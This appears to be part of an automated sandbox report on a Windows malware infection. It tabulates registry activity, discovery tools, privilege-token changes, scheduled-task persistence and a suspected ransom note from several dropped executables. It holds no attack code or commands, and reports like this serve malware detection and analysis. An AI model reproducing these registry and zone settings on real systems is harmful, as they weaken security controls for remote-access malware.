Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1719112073.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\builder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\sysnldcvmr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2472628288.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2802026625.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\188477111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2009521560.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\333.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\key.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

System Network Connections Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags C:\Windows\system32\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\TSRedirFlags C:\Windows\system32\mstsc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Device Parameters C:\Windows\system32\mstsc.exe N/A
Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters C:\Windows\system32\mstsc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\Device Parameters C:\Windows\system32\mstsc.exe N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = eff8d4e8d40cfce88522ade2145f6c05662b27ed79491d67b694f14440a439d7cd741642d3ff1085374c125e8329dd57233d521631fe83dade1a01d333cb136313584ec7ab76cc0a5913ff C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\system32\mstsc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1392523614.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
